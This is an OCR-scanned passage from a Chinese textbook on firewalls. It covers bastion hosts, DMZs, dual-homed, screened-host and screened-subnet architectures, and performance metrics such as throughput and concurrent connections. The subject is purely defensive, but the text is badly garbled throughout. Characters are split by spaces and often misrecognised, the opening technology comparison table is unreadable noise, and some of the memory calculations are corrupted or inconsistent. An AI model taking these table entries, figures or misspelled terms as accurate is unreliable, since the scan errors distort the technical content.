包 过 滤 防 火 墙 , 代 理 服务 器 防火 墙 和 状态 检测 防火 墙 的 技术 和 人 性 能 比较 如 表 4-6 所 列 。 


表 4-6 防火 墙 技 术 比较 表 





























性 能 
综合 安全 性 | 网 络 层 保护 | 应 用 层 保护 | 应 用 层 透明 | 整体 性 能 | 处 理 对 象 
包 过 滤 防 火 墙 * *** * 六 交 六 交大 k**w** | 单个 包 报头 
代理 服务 器 防火 墙 *** * k**wk*x* * * 单个 包 报头 
状态 检测 防火 墙 ** ***** ** ck x kx | ox ve x x X | 单个 包 数 据 
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4.4 防火墙 系统 体系 结构 


防火 墙 是 保护 网 络 安 全 的 一 个 很 好 的 选择 ,设置 防火 墙 、 选 择 合适 类 型 的 防火 墙 并 配置 
它 , 是 用 好 防火 墙 的 三 大 关键 任务 。 如 何 设置 它 .应 该 将 它 放 到 什么 位 置 是 本 节 要 讨论 的 问 
题 。 在 网 络 设计 时 要 考虑 网 络 安全 问题 ,所 以 网 络 拓扑 结构 应 该 有 网 络 安全 拓扑 内 容 。 关 
注 网 络 安全 拓扑 设计 对 阻止 网 络 攻击 大 有 帮助 ,并 且 能 够 使 不 同 设备 的 安全 特性 得 到 最 有 
效 的 使 用 。 
4.4.1 常见 术语 

在 介绍 防火 墙 系统 体系 结构 之 前 , 先 对 防火 墙 体系 结构 中 常见 的 术语 进行 简要 说 明 。 

1. 堡垒 主机 

堡垒 主机 是 指 可 能 直接 面 对 外 部 用 户 攻 击 的 主机 系统 ,在 防火 墙 体 系 结构 中 , 特 指 那些 
处 于 内 部 网 络 的 边缘 ,并 且 暴 露 于 外 部 网 络 用 户 面前 的 主机 系统 。 在 网 络 中 堡垒 主机 是 经 
过 加 固 ,安装 了 防火 墙 软件 ,但 没有 IP 转发 功能 的 计算 机 。 它 对 外 界 提供 一 些 必要 的 服务 ， 
也 可 以 被 内 部 用 户 访 问 。 通 常 它 只 提供 一 种 服务 ,因为 提供 的 服务 越 多 ,导致 被 攻击 的 可 能 
性 也 就 越 大 。 

堡垒 主 机 位 于 非 军事 区 ,如 果 保 又 主机 提供 代理 服务 , 它 会 知道 自己 将 要 为 哪些 应 用 提 
供 代 理 。 堡 又 主机 配置 如 下 。 

CD 禁用 不 需要 的 服务 。 

(2) 限制 端口 。 

(3) 禁用 账户 。 

(4) 及 时 地 安装 所 需要 的 补丁 。 

(5) 大 部 分 能 够 用 于 操纵 该 台 主 机 的 工具 和 配置 程序 都 要 从 该 主机 中 删除 。 

(6) 开启 主机 的 日 志 记录 ,以 便 捕获 任何 危害 它 的 企图 。 

(7) 进行 备份 。 

(8) 堡垒 主机 和 内 部 网 要 使 用 不 同 的 认证 系统 ,以 防止 攻击 者 攻破 堡垒 主 机 后 获得 访 
问 防火 墙 和 内 部 网 的 权限 。 

图 4-36 描述 了 一 种 典型 的 堡垒 主机 部 署 方案 。 





图 4-36 堡垒 主机 的 一 种 典型 部 署 方 案 示 意图 
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2. 双重 宿主 主机 

双重 宿主 主机 是 指 至 少 拥有 两 个 以 上 网 络 接口 且 每 个 网 络 接口 连接 不 同 网 络 的 计算 机 
系统 ,因此 也 称 其 为 多 穴 主机 系统 。 一 般 来 说 ,双重 宿主 主机 是 实现 多 个 网 络 之 间 互 联 的 关 
键 设备 ,如 网 桥 是 在 数据 链 路 层 实现 互联 的 双重 宿主 主机 ,路 由 器 是 在 网 络 层 实现 互联 的 双 
重 宿主 主机 ,应 用 层 网 关 是 在 应 用 层 实 现 互联 。 

3. 周边 网 络 

周边 网 络 是 指 在 内 部 网 络 、 外 部 网 络 之 间 增 加 的 一 个 网 络 ,一 般 来 说 ,对 外 提供 服务 的 
各 种 服务 器 都 可 以 放 在 这 个 网 络 里 。 周 边 网 络 也 称 为 非 军 事 区 (DeMilitarized Zone, DMZ) 
或 中 立 区 。 周 边 网 络 的 存在 ,使 得 外 部 用 户 访问 服务 器 时 不 需要 进入 内 部 网 络 ,而 内 部 网 络 
用 户 对 服务 器 维护 工作 导致 的 信息 传递 也 不 会 泄露 至 外 部 网 络 ; 同时 ,周边 网 络 与 外 部 网 
络 或 内 部 网 络 之 间 都 存在 着 数据 包 过 滤 ,这 样 为 外 部 用 户 的 攻击 设置 了 多 重 障碍 ,确保 了 内 
部 网 络 的 安全 。 周 边 网 络 工 作 原 理 如 图 4-37 所 示 。 
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4-37 周边 网 络 工作 示意 图 


防火 墙 的 经 典 体系 结构 主要 有 双重 宿主 主机 体系 结构 、 被 屏蔽 主机 体系 结构 和 被 屏蔽 
子 网 体系 结构 3 种 形式 。 


4.4.2 双重 宿主 主机 体系 结构 


防火 墙 的 双重 宿主 主机 体系 结构 是 指 以 一 台 双 重 宿主 主机 作为 防火 墙 系统 的 主体 , 执 
行 分 离 外 部 网 络 与 内 部 网 络 的 任务 。 典 型 的 双重 宿主 主机 体系 结构 如 图 4-38 所 示 。 

在 基于 双重 宿主 主机 体系 结构 的 防火 墙 中 , 带 有 内 部 网 络 和 外 部 网 络 接口 主机 系统 就 
构成 了 防火 墙 的 主体 ,该 台 双 重 宿主 主机 具备 了 成 为 内 部 网 络 和 外 部 网 络 之 间 路 由 器 的 条 
件 , 但 是 在 内 部 网 络 与 外 部 网 络 之 间 进 行 数据 包 转发 的 进程 是 被 禁止 运行 的 。 为 了 达到 防 
火 墙 的 基本 效果 ,在 双重 宿主 主机 系统 中 ,任何 路 由 功能 都 是 被 禁止 的 ,甚至 前 面 介 绍 的 数 
据 包 过 滤 技 术 也 是 不 允许 在 双重 宿主 主机 上 实现 的 。 双 重 宿主 主机 唯一 可 以 采用 的 防火 墙 
技术 就 是 应 用 层 代 理 , 内 部 网 络 用 户 可 以 通过 客户 端 代 理 软件 以 代理 方式 访问 外 部 网 络 资 
源 , 或 者 直接 登录 至 双重 宿主 主机 成 为 一 个 用 户 , 再 利用 该 主机 直接 访问 外 部 资源 。 
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4-38 ”双重 宿主 主机 体系 结构 示意 图 


双重 宿主 主机 体系 结构 防火 墙 的 优点 在 于 网 络 结构 比较 简单 ,由 于 内 、 外 网 络 之 间 没 有 
直接 的 数据 交互 而 较为 安全 ; 内 部 用 户 账号 的 存在 可 以 保证 对 外 部 资源 进行 有 效 控制 ; 由 
于 应 用 层 代理 机 制 的 采用 ,可 以 方便 地 形成 应 用 层 的 数据 与 信息 过 滤 。 

其 缺点 在 于 ,用 户 访 问 外 部 资源 较为 复杂 ,如 果 用 户 需 要 登录 到 主机 上 才能 访问 外 部 资 
源 , 则 主机 的 资源 消耗 较 大 ; 用 户 机 制 存在 着 安全 隐患 ,并 且 内 部 用 户 无 法 借助 该 体系 结构 
访问 新 的 服务 或 特殊 服务 ; 一 旦 外 部 用 户 入 侵 了 双重 宿主 主机 ,将 导致 内 部 网 络 处 于 不 安 
全 状态 。 


4.4.3 ”被 屏蔽 主机 体系 结构 


被 屏蔽 主机 体系 结构 是 指 通过 一 个 单独 的 路 由 器 和 内 部 网 络 上 的 堡垒 主机 共同 构成 防 
火 墙 ,主要 通过 数据 包 过 滤 技 术 实现 内 、 外 网 络 的 隔离 和 对 内 网 的 保护 ,一 个 典型 的 被 屏蔽 
的 主机 体系 结构 如 图 4-39 所 示 。 
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4-39 被 屏蔽 主机 体系 结构 示意 图 


在 被 屏蔽 主机 体系 结构 中 有 两 道 屏 障 : 一 道 是 屏蔽 路 由 器 ; 另 一 道 是 堡 人 又 主机。 屏蔽 
路 由 器 位 于 网 络 的 最 边缘 ,负责 与 外 网 实施 连接 ,并 且 参 与 外 网 的 路 由 计算 。 屏 项 路 由 器 不 
提供 任何 服务 , 仅 提供 路 由 和 数据 包 过 滤 功 能 ,因此 屏蔽 路 由 器 本 身 较 为 安全 ,被 攻击 的 可 
能 性 较 小 。 由 于 屏蔽 路 由 器 的 存在 ,使 得 堡垒 主机 不 再 是 直接 与 外 网 互 连 的 双重 宿主 主机 ， 
因而 增加 了 系统 的 安全 性 。 

堡垒 主机 存放 在 内 部 网 络 中 ,是 内 部 网 络 系统 中 唯一 可 以 连接 到 外 部 网 络 系统 的 主机 ， 
也 是 外 部 用 户 访问 内 部 网 络 资源 必须 经 过 的 主机 设备 。 在 经 典 的 被 屏蔽 主机 体系 结构 中 ， 
堡垒 主机 也 通过 数据 包 过 滤 功能 实现 对 内 部 网 络 的 防护 ,并 且 该 堡垒 主机 仅仅 允许 通过 特 
定 的 服务 连接 。 堡 又 主机 可 以 不 提供 数据 包 过 滤 功 能 ,而 提供 代理 功能 ,内 部 用 户 只 能 通过 
应 用 层 代 理 访问 外 部 网 络 ,而 堡垒 主机 就 成 为 外 部 用 户 唯一 可 以 访问 的 内 部 主机 。 

1. 优点 

与 双重 宿主 主机 体系 结构 相 比 ,被 屏蔽 主机 体系 结构 的 优点 表现 在 以 下 几 个 方面 。 

(1) 比 双重 宿主 主机 体系 结构 具有 更 高 的 安全 特性 。 由 于 屏蔽 路 由 器 在 堡垒 主机 之 外 
提供 数据 包 过 滤 功 能 ,使 得 堡垒 主 机 比 双重 宿主 主机 更 安全 ,存在 漏洞 的 可 能 性 较 小 ; 同 
时 ,堡垒 主机 的 数据 包 过 滤 功 能 限制 外 部 用 户 只 能 访问 特定 主机 上 的 特定 服务 ,或 者 只 能 访 
问 堡垒 主机 上 的 特定 服务 ,在 提供 服务 的 同时 仍然 保证 了 内 部 网 络 的 安全 。 

(2) 内 部 网 络 用 户 访问 外 部 网 络 较为 方便 .灵活 ,在 屏蔽 路 由 器 和 堡垒 主机 人 允许 的 情况 
下 ,用 户 可 以 直接 访问 外 部 网 络 。 

如 果 屏 项 路 由 器 和 堡垒 主机 不 允许 内 部 用 户 直接 访问 外 部 网 络 , 则 用 户 通过 保 从 主机 
提供 的 代理 服务 访问 外 部 资源 。 在 实际 应 用 中 ,将 两 种 方式 综合 运用 ,访问 不 同 的 服务 采用 
不 同 的 方式 。 例 如 ,内 部 用 户 访 问 WWW ,可 以 采用 堡垒 主机 的 应 用 层 代 理 , 一 些 新 的 服务 
可 以 直接 访问 。 

(3) 由 于 堡垒 主机 和 屏蔽 路 由 器 的 同时 存在 ,使 得 堡 公主 机 可 以 从 部 分 安全 事务 中 解 
脱出 来 ,从 而 可 以 以 更 高 的 效率 提供 数据 包 过 滤 或 代理 服务 。 

2. 缺点 

与 双重 宿主 主机 体系 结构 相 比 ,被 屏蔽 主机 体系 结构 的 主要 缺点 在 于 以 下 几 点 。 

CD 在 被 屏蔽 主机 体系 结构 中 ,外 部 用 户 在 被 允许 的 情况 下 可 以 访问 内 部 网 络 ,这 样 就 
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存在 着 一 定 的 安全 隐患 。 
(2) 与 双重 宿主 主机 体系 一 样 ,一 旦 用 户 人 侵 堡 令 主 机 ,就 会 导致 内 部 网 络 处 于 不 安全 





(3) 路 由 器 和 堡垒 主机 的 过 滤 规 则 配置 较为 复杂 , 较 容易 形成 错误 和 漏洞 。 


4.4.4 被 屏蔽 子 网 体系 结构 


在 防火 墙 的 双重 宿主 主机 体系 结构 和 被 屏蔽 主机 体系 结构 中 ,主机 都 是 最 主要 的 安全 
缺陷 ,一 旦 主机 被 入 侵 , 则 整个 内 部 网 络 都 处 于 入 侵 者 的 威胁 之 中 ,为 消除 这 种 安全 隐患 ,出 
现 了 被 屏蔽 子 网 体系 结构 。 被 屏蔽 子 网 体系 结构 将 防火 墙 的 概念 扩充 至 一 个 由 两 台 路 由 器 
包围 起 来 的 特殊 网 络 , 即 周 边 网 络 ,并 且 将 容易 受到 攻击 的 堡垒 主 机 都 置 于 这 个 周边 网 络 
中 ,一 个 典型 的 被 屏蔽 子 网 体系 结构 如 图 4-40 所 示 。 
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4-40 ”被 屏蔽 子 网 体系 结构 示意 图 


被 屏蔽 子 网 体系 结构 的 防火 墙 比 较 复 杂 , 主 要 由 4 个 部 件 构成 ,分 别 为 周边 网 络 、. 外 部 
路 由 器 .内 部 路 由 器 以 及 保 人 又 主机。 

1. 周边 网 络 

周边 网 络 是 位 于 非 安 全 不 可 信 的 外 部 网 络 与 安全 、 可 信 的 内 部 网 络 之 间 的 一 个 附加 网 
络 。 周 边 网 络 与 外 部 网 络 、 周 边 网 络 与 内 部 网 络 之 间 都 是 通过 屏蔽 路 由 器 实现 逻辑 隔离 , 因 
此 ,外 部 用 户 必须 穿越 两 道 屏蔽 路 由 器 才能 访问 内 部 网 络 。 一 般 情况 下 ,外 部 用 户 不 能 访问 
内 部 网 络 , 仅 能 够 访问 周边 网 络 中 的 资源 。 由 于 内 部 用 户 间 通 信 的 数据 包 不 会 通过 屏蔽 路 
由 器 传递 至 周边 网 络 ,外 部 用 户 即 使 人 侵 了 周边 网 络 中 的 堡垒 主机 ,也 无 法 监听 到 内 部 网 络 
的 信息 。 

2. 外 部 路 由 器 

外 部 路 内 器 的 主要 作用 在 于 保护 周边 网 络 和 内 部 网 络 , 是 屏 项 子 网 体系 结构 的 第 一 道 
屏障 。 在 其 上 设置 了 对 周边 网 络 和 内 部 网 络 进行 访问 的 过 滤 规 则 ,该 规则 主要 针对 外 网 用 
户 。 例 如 ,限制 外 网 用 户 仅 能 访问 周边 网 络 而 不 能 访问 内 部 网 络 ,或 者 仅 能 访问 内 部 网 络 中 
的 部 分 主机 。 外 部 路 由 器 基本 上 对 周边 网 络 发 出 的 数据 包 不 进行 过 滤 ,因为 周边 网 络 发 送 
的 数据 包 都 来 自 于 堡垒 主机 或 由 内 部 路 由 器 过 滤 后 的 内 部 主机 数据 包 。 外 部 路 由 器 上 应 当 
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复制 内 部 服务 器 上 的 规则 ,以 避免 内 部 路 由 器 失效 而 造成 负面 影响 。 

3. 内 部 路 由 器 

内 部 路 由 器 用 于 隔离 周边 网 络 和 内 部 网 络 ,是 屏蔽 子 网 体系 结构 的 第 二 道 屏障 。 在 其 
上 设置 了 针对 内 部 用 户 的 访问 过 滤 规 则 、 对 内 部 用 户 访问 周边 网 络 和 外 部 网 络 进 行 限制 。 
例如 ,部 分 内 部 网 络 用 户 只 能 访问 周边 网 络 而 不 能 访问 外 部 网 络 等 。 内 部 路 由 器 上 复制 了 
外 部 路 由 器 上 的 内 网 过 滤 规 则 ,以 防止 外 部 路 由 器 的 过 滤 功 能 失效 而 造成 的 严重 后 果 。 内 
部 路 由 器 还 要 限制 周边 网 络 的 堡垒 主机 和 内 部 网 络 之 间 的 访问 ,以 减少 在 堡垒 主机 被 人 侵 
后 可 以 影响 的 内 部 主机 数量 和 服务 的 数量 。 

4. 堡垒 主机 

在 被 屏蔽 子 网 结构 中 ,堡垒 主机 位 于 周边 网 络 , 可 以 向 外 部 用 户 提供 WWW、FTP 等 服 
务 ,接受 来 自 外 部 网 络 用 户 的 服务 资源 访问 请 求 , 同 时 堡垒 主机 也 向 内 部 网 络 用 户 提供 
DNS.WWW 代理 .FTP 代理 等 服务 ,提供 内 部 网 络 用 户 访问 外 部 资源 的 接口 。 

与 双重 宿主 主机 体系 结构 和 被 屏蔽 主机 体系 结构 相 比较 ,被 屏蔽 子 网 体系 结构 具有 了 明 
显 的 优越 性 ,这 些 优 越 性 体现 在 以 下 几 个 方面 。 

(1) 由 外 部 路 由 器 和 内 部 路 由 器 构成 了 双 层 防护 体系 ,入 侵 者 难以 突破 。 

(2) 外 部 用 户 访问 服务 资源 时 不 需要 进入 内 部 网 络 , 在 保证 服务 的 情况 下 提高 了 内 部 
网 络 的 安全 性 。 

(3) 外 部 路 由 器 和 内 部 路 由 器 上 的 过 滤 规 则 复制 避免 了 由 于 某 台 路 由 器 失效 产生 的 安 
全 隐患 。 

(4) 堡垒 主机 由 外 部 路 由 器 的 过 滤 规 则 和 本 机 安全 机 制 共 同 防护 ,用 户 只 能 访问 它 提 
供 的 服务 。 

(5) 即使 人 侵 者 通过 堡垒 主机 提供 服务 中 的 缺陷 控制 了 堡垒 主机 ,由 于 内 部 路 由 器 将 
内 部 网 络 和 周边 网 络 隔离 ,人 侵 者 无 法 通过 监听 周边 网 络 获取 内 部 网 络 信息 。 

与 双重 宿主 主机 体系 结构 和 被 屏蔽 主机 体系 结构 相 比较 ,被 屏蔽 子 网 体系 结构 的 缺点 
主要 在 于 以 下 几 点 。 

(1) 构建 被 屏蔽 子 网 体系 结构 的 成 本 较 高 。 

(2) 被 屏 项 子 网 体系 结构 的 配置 较为 复杂 ,容易 出 现 配 置 错误 而 导致 的 安全 隐患 。 


4.5 防火墙 技术 指标 


1. 吞吐 量 

网 络 中 的 数据 是 由 一 个 个 数据 包 组 成 ,防火 墙 对 每 个 数据 包 的 处 理 要 耗费 资源 。 吞 吐 
量 是 指 在 没有 帧 丢失 的 情况 下 ,设备 能 够 接受 的 最 大 速率 。 衡 量 标准 是 吞吐 量 越 大 ,防火 墙 
的 性 能 越 高 。 

吞吐 量 测试 方法 : 在 测试 中 以 一 定 速率 发 送 一 定数 量 的 帧 ,并 计算 待 测 设备 传输 的 帧 ， 
如 果 发 送 的 帧 与 接收 的 帧 数量 相等 ,那么 就 将 发 送 速 率 提 高 并 重新 测试 ; 如 果 接 收 帧 少 于 
发 送 帧 则 降低 发 送 速率 重新 测试 ,直至 得 出 最 终结 果 。 香 吐 量 测 试 结果 以 b/s 或 B/s 表示 。 
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吞吐 量 和 报 文 转发 率 是 关系 防火 墙 应 用 的 主要 指标 ,一 般 采 用 FDT (Full Duplex 
Throughput) 来 衡量 , 指 64B 数据 包 的 全 双 工 吞吐 量 , 该 指标 既 包括 吞吐 量 指标 ,也 涵盖 了 
报 文 转发 率 指标 。 

随 着 Internet 的 日 益 普及 ,内 部 网 用 户 访问 Internet 的 需求 在 不 断 增加 ,一 些 企业 也 需 
要 对 外 提供 如 WWW 页 面 浏览 .FTP 文件 传输 .DNS 域名 解析 等 服务 ,这 些 因 素 会 导致 网 
络 流量 的 急剧 增加 ,而 防火 墙 作 为 内 外 网 之 间 的 唯一 数据 通道 ,如 果 吞 吐 量 太 小 ,就 会 成 为 
网 络 瓶 颈 , 给 整个 网 络 的 传输 效率 带 来 负面 影响 。 因 此 ,考察 防火 墙 的 吞吐 能 力 有 助 于 更 好 
地 评价 其 性 能 表现 。 这 也 是 测量 防火 墙 性 能 的 重要 指标 。 

吞吐 量 的 大 小 主要 由 防火 墙 内 网 卡 及 程序 算法 的 效率 决定 ,尤其 是 程序 算法 ,会 使 防火 
墙 系统 进行 大 量 运算 ,通信 量 大 打折 扣 。 因 此 ,大 多 数 防 火 墙 虽 号 称 100M 防火 墙 , 由 于 其 
算法 依靠 软件 实现 ,通信 量 远 远 没有 达到 100M, 实 际 只 有 10 一 20M。 纯 硬件 防火 墙 , 由 于 
采用 硬件 进行 运算 ,因此 吞吐 量 可 以 达到 线性 90—95M ,这 才 是 真正 的 100M 防火 墙 。 防 火 
墙 吞吐 量 测 试 如 图 4-41 所 示 。 
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图 4-41 防火 墙 吞吐 量 示意 图 


对 于 中 小 型 企业 来 讲 ,选择 吞吐 量 为 百 兆 级 的 防火 墙 即 可 满足 需要 ,而 对 于 电信 ,金融 、 
保险 等 大 公司 大 、 企 业 部 门 ,就 需要 采用 吞吐 量 千 兆 级 的 防火 墙 产品 。 

2. 并 发 连接 数 

并 发 连接 数 是 指 防火 墙 或 代理 服务 器 对 其 业务 信息 流 的 处 理 能 力 , 是 防火 墙 能 够 同时 
处 理 的 点 对 点 连接 的 最 大 数目 , 它 反映 出 防火 墙 设备 对 多 个 连接 的 访问 控制 能 力 和 连接 状 
态 跟踪 能 力 , 这 个 参数 的 大 小 直接 影响 到 防火 墙 所 能 支持 的 最 大 信息 点 数 。 衡 量 标准 : 并 
发 连接 数 主 要 用 来 测试 防火 墙 建立 和 维持 TCP 连接 的 性 能 ,并 发 连接 数 越 大 ,防火 墙 的 处 
理性 能 越 高 。 

信息 点 数 举例 : 单 击 一 个 连接 上 的 图 片 ,而 这 个 图 片 可 能 是 这 个 连接 从 另外 一 个 连接 
上 连接 过 来 的 ,你 可 能 不 止 连接 了 一 张 图 片 ,可 能 还 连接 了 很 多 数据 、 视 频 等 ,这 个 连接 可 能 
非常 多 ,可 能 几 十 个 或 者 上 百 上 千 个 。 

并 发 连接 数 是 衡量 防火 墙 性 能 的 一 个 重要 指标 。 在 目前 市 面 上 常见 防火 墙 设备 的 说 明 
书 中 大 家 可 以 看 到 ,从 低 端 设备 的 500、1000 个 并 发 连接 ,一 直到 高 端 设备 的 数 万 、 数 十 万 并 
发 连接 ,存在 着 好 几 个 数量 级 的 差异 。 那 么 ,并 发 连接 数 究 竞 是 一 个 什么 概念 呢 ? 它 的 大 小 
会 对 用 户 的 日 常 使 用 产生 什么 影响 呢 ? 要 了 解 并 发 连接 数 ,首先 需要 明白 一 个 概念 , 那 就 是 
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“会 话 ”。 这 个 “会 话 ” 可 不 是 我 们 平时 的 谈话 ,但 是 可 以 用 平时 的 谈话 来 理解 ,两 个 人 在 谈话 
时 ,你 一 句 ,我 一 句 , 一 问 一 答 ,把 它 称 为 一 次 对 话 或 者 叫 会 话 。 同 样 , 用 计算 机 工作 时 ,打开 
的 一 个 窗口 或 一 个 Web 页 面 ,可 以 把 它 叫 做 一 个 “会 话 ”, 扩 展 到 一 个 局 域 网 里 面 ,所 有 用 户 
要 通过 防火 墙 上 网 ,要 打开 很 多 个 窗口 或 Web 页 面 ( 即 会 话 ), 那 么 ,这 个 防火 墙 ,所 能 处 理 
的 最 大 会 话 数量 ,就 是 “并 发 连接 数 "。 同 时 建立 的 TCP 并 发 连接 数 如 图 4-42 所 示 。 


并 发 连接 数 指标 可 以 用 来 衡量 穿越 防火 
墙 时 同时 建立 的 最 大 连接 数 





4-42 ”并 发 连接 数 示意 图 


像 路 由 器 的 路 由 表 存 放 路 由 信息 一 样 ,防火 墙 里 也 有 一 个 这 样 的 表 , 把 它 叫做 并 发 连接 
表 , 用 以 存放 并 发 连接 信息 的 地 方 , 它 可 在 防火 墙 系统 启动 后 动态 分 配 进 程 的 内 存 空 间 , 其 
大 小 也 就 是 防火 墙 所 能 支持 的 最 大 并 发 连接 数 。 大 的 并 发 连接 表 可 以 增 大 防火 墙 最 大 并 发 
连接 数 , 允 许 防 火 墙 支 持 更 多 的 客户 终端 。 尽管 看 上 去 防火 墙 等 类 似 产 品 的 并 发 连接 数 似 
乎 是 越 大 越 好 ,但 与 此 同时 ,过 大 的 并 发 连接 表 也 会 带 来 一 定 的 负面 影响 。 

CD 并 发 连接 数 的 增 大 意味 着 对 系统 内 存 资源 的 消耗 。 以 每 个 并 发 连接 表 项 占用 
300B 计算 ,1000 个 并 发 连接 将 占用 300BX 1000 X 8b/B=z2. 3Mb 内 存 空间 ,10 000 个 并 发 
连接 将 占用 23Mb 内 存 空间 ,100 000 个 并 发 连接 将 占用 230Mb 内 存 空间 ,而 如 果真 的 试图 
实现 1 000 000 个 并 发 连接 的 话 ,那么 这 个 产品 就 需要 提供 2. 24Gb 内 存 空间 ! 

(2) 并 发 连接 数 的 增 大 应 当 充 分 考虑 CPU 的 处 理 能 力 。CPU 的 主要 任务 是 把 网 络 上 
的 流量 从 一 个 网 段 尽 可 能 快速 地 转发 到 另 一 个 网 段 上 ,并 且 在 转发 过 程 中 对 此 流量 按照 一 
定 的 访问 控制 策略 进行 许可 检查 .流量 统计 和 访问 审计 等 操作 ,这 都 要 求 防火 墙 对 并 发 连接 
表 中 的 相应 表 项 进行 不 断 的 更 新 读 写 操作 。 如 果 不 顾 CPU 的 实际 处 理 能 力 而 贸然 增 大 系 
统 的 并 发 连接 表 ,势必 影响 防火 墙 对 连接 请 求 的 处 理 延 迟 ,造成 某 些 连接 超时 ,让 更 多 的 连 
接 报 文 被 重 发 ,进而 导致 更 多 的 连接 超时 ,最 后 形成 雪崩 效应 ,致使 整个 防火 墙 系统 崩溃 。 

(3) 物理 链 路 的 实际 承载 能 力 严重 影响 防火 墙 发 挥 出 其 对 海量 并 发 连接 的 处 理 能 力 。 
虽然 目前 很 多 防火 墙 都 提供 了 10/100/1000Mb/s 的 网 络 接口 ,但 是 ,由 于 防火 墙 通常 都 部 
署 在 Internet 出 口 处 ,在 客户 端 PC 与 目的 资源 中 间 的 路 径 上 总 是 存在 着 瓶颈 链 路 ,该 瓶颈 
链 路 可 能 是 2Mb/s 专线 ,也 可 能 是 512kb/s 乃至 64kb/s 的 低速 链 路 。 这 些 拥挤 的 低速 链 
路 根本 无 法 承载 太 多 的 并 发 连接 ,所 以 即便 是 防火 墙 能 够 支持 大 规模 的 并 发 访问 连接 ,也 无 
法 发 挥 出 其 原 有 的 性 能 。 

有 鉴于 此 ,应 当 根 据 网 络 环境 的 具体 情况 和 个 人 不 同 的 上 网 习惯 来 选择 适当 规模 的 并 
发 连接 表 。 因 为 不 同 规模 的 网 络 会 产生 大 小 不 同 的 并 发 连接 ,而 用 户 习 惯 于 何 种 网 络 服务 
以 及 如 何 使 用 这 些 服务 ,同样 也 会 产生 不 同 的 并 发 连接 需求 。 高 并 发 连接 数 的 防火 墙 设备 
通常 需要 客户 投资 更 多 的 设备 ,这 是 因为 并 发 连接 数 的 增 大 牵扯 到 数据 结构 .CPU、 内 存 、 
系统 总 线 和 网 络 接 口 等 多 方面 因素 。 如 何在 合理 的 设备 投资 和 实际 上 所 能 提供 的 性 能 之 间 
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寻找 一 个 黄金 平衡 点 将 是 用 户 选 择 产品 的 一 个 重要 任务 。 按 照 并 发 连接 数 来 衡量 方案 的 合 
理性 是 一 个 值得 推荐 的 办 法 。 

以 每 个 用 户 需 要 10. 5 个 并 发 连接 来 计算 ,一 个 中 小 型 企业 网 络 (1000 个 信息 点 以 下 ， 
容纳 4 个 C 类 地 址 空间 ) 大 概 需要 10. 55x 1000 —10 500 个 并 发 连接 ,因此 支持 20 000 — 
30 000 最 大 并 发 连接 的 防火 墙 设备 便 可 以 满足 需求 ; 大 型 的 企 事 业 单 位 网 络 ( 例 如 信息 点 
ŽE 1000—10 000 之 间 ) 大 概 会 需要 105 000 个 并 发 连接 ,所 以 支持 100 000—120 000 最 大 
并 发 连接 的 防火 墙 就 可 以 满足 企业 的 实际 需要 ; 而 对 于 大 型 电信 运营 商 和 ISP 来 说 ,电信 
级 的 千 兆 防火 墙 ( 支 持 120 000—200 000 个 并 发 连接 ) 则 是 恰当 的 选择 。 为 较 低 需 求 而 采用 
高 端的 防火 墙 设备 将 造成 用 户 投 资 的 浪费 ,同样 为 较 高 的 客户 需求 而 采用 低 端 设备 将 无 法 
达到 预计 的 性 能 指标 。 利 用 网 络 整体 上 的 并 发 连接 需求 来 选择 适当 的 防火 墙 产品 可 以 帮助 
用 户 快 速 \ 准 确 地 定位 所 需要 的 产品 ,避免 对 单纯 某 一 参数 “ 越 大 越 好 ”的 盲目 追求 ,缩短 设 
计 施 工 周 期 ,节省 企业 的 开支 。 从 而 为 企业 实施 最 合理 的 安全 保护 方案 。 

3. 时 延 

时 延 是 指 入 口 处 输入 帧 最 后 一 个 比特 到 达 至 出 口 处 输出 帧 的 第 一 个 比特 输出 所 用 的 时 
间 间 隔 。 衡 量 标准 : 延 时 越 小 ,表示 防火 墙 的 性 能 越 高 。 时 延 原理 如 图 4-43 所 示 。 
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丢 包 率 是 指 在 连续 负载 的 情况 下 ,防火 墙 设备 由 于 资源 不 足 应 转发 但 却 未 转发 的 帧 百 
分 比 。 衡 量 标准 : 丢 包 率 越 小 ,防火 墙 的 性 能 越 高 。 丢 包 率 如 图 4-44 所 示 。 

5. 背靠背 

背靠背 是 指 从 空闲 状态 开始 ,以 达到 传输 介质 最 小 合法 间隔 极限 的 传输 速率 发 送 相当 
数量 的 固定 长 度 的 帧 , 当 出 现 第 一 个 帧 丢失 时 所 发 送 的 帧 数 。 衡 量 标准 : 背 对 背包 主要 是 
指 防 火 墙 缓冲 容量 的 大 小 ,网 络 上 经 常 有 一 些 应 用 会 产生 大 量 的 突 发 数据 包 (NFS、 备 份 、 路 
由 更 新 等 ) ,而 且 这 样 的 数据 包 的 丢失 可 能 会 产生 更 多 的 数据 包 的 丢失 ,强大 的 缓冲 能 力 可 
以 减 小 这 种 突 发 事件 对 网 络 造成 的 影响 。 背 靠背 如 图 4-45 所 示 。 
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丢 包 率 =(1000-800)/1000=20% 
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444 丢 包 率 示 意图 





背靠背 是 体现 防火 墙 对 
突 发 数据 的 处 理 能 力 
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445 背靠背 示意 图 


6. 工作 模式 

目前 的 防火 墙 都 具有 4 种 工作 模式 , 即 路 由 模式 ,透明 模式 NAT 模式 和 混合 模式 。 

CD 路 由 模式 。 网 络 防 火 墙 类 似 于 一 台 路 由 器 转发 数据 包 , 将 接收 到 的 数据 包 的 源 
MAC 地 址 替换 为 相应 接口 的 MAC 地 址 ,然后 转发 。 路 由 模式 适用 于 每 个 区 域 都 不 在 同一 
个 网 段 的 情况 。 和 路 由 器 一 样 ,防火 墙 的 每 个 接口 均 要 根据 区 域 规 划 配 置 IP 地 址 。 

(2) 透明 模式 。 防 火 墙 过 滤 通 过 它 的 封包 ,而 不 会 修改 数据 包 包头 中 的 任何 源 或 目的 
地 信息 。 所 有 接口 运行 起 来 都 像 是 同一 网 络 中 的 一 部 分 。 此 时 ,防火 墙 的 作用 更 像 是 
Layer 2 交换 机 或 桥接 器 。 在 透明 模式 下 ,接口 的 IP 地 址 被 设置 为 0. 0. 0.0 ,防火 墙 对 于 用 
户 来 说 是 可 视 的 或 “透明 ”的 。 

(3) 网 络 地 址 转换 (NAT) 模 式 。 防 火 墙 的 作用 与 Layer 3 交换 机 (或 路 由 器 ) 相 似 , 将 
绑 定 到 外 网 区 段 的 IP 封包 包头 中 的 两 个 组 件 进行 转换 : 其 源 IP 地 址 和 源 端口 号 。 防 火 墙 
用 目的 地 区 段 接口 的 IP 地 址 替换 发 送 封包 的 主机 的 源 IP 地 址 。 另 外 , 它 用 另 一 个 防火 墙 
生成 的 任意 端口 号 替换 源 端口 号 。 

